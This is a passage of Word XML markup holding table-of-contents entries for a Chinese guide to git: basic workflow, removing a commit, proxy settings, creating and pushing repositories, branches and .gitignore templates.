        <w:p w14:paraId="7E22DAB6" w14:textId="61E5FBF4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779494" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>基本的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>git</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>工作流程</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779494 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A2D6E82" w14:textId="008BC3DC" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779495" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>git</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>删除某个中间的提交记录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779495 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BF52467" w14:textId="0883AB70" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779496" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>更改登录用户名或邮箱</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779496 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66825F94" w14:textId="72303567" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779497" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>git</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>设置代理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779497 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>59</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32999AA4" w14:textId="5074EC46" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779498" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>git log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779498 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>59</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49CE524E" w14:textId="5208C43E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779499" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>新建项目仓库</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779499 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B38542E" w14:textId="761AD5AE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779500" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>git init</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>创建本地</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>git</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>项目</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779500 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B021406" w14:textId="5B6582C4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779501" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>github</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>上创建一个仓库</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779501 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69C6DD34" w14:textId="4296F2A2" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779502" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>添加远程仓库</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779502 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D21087C" w14:textId="3DC7E958" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779503" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>从远程</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>master</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>合并到本地</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>master</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779503 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="474F2270" w14:textId="250FBFDA" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779504" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>提交本地分支到远程分支</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779504 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41E8EEAA" w14:textId="0710A927" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779505" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>将现有项目添加并提交上传</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779505 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2018D0A4" w14:textId="45415D5E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779506" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>查看分支</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779506 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7308F818" w14:textId="66EAF539" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779507" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>切换分支</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779507 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A22ACBA" w14:textId="2F54A3B0" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779508" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>.gitignore</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：忽略不上传内容</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779508 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F4926B9" w14:textId="35EDC673" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779509" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>我的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>.gitignore</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>模板</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779509 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="145F682B" w14:textId="54DDB884" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779510" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>其他示例</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779510 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>62</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B2BEEBF" w14:textId="1EA9E82F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
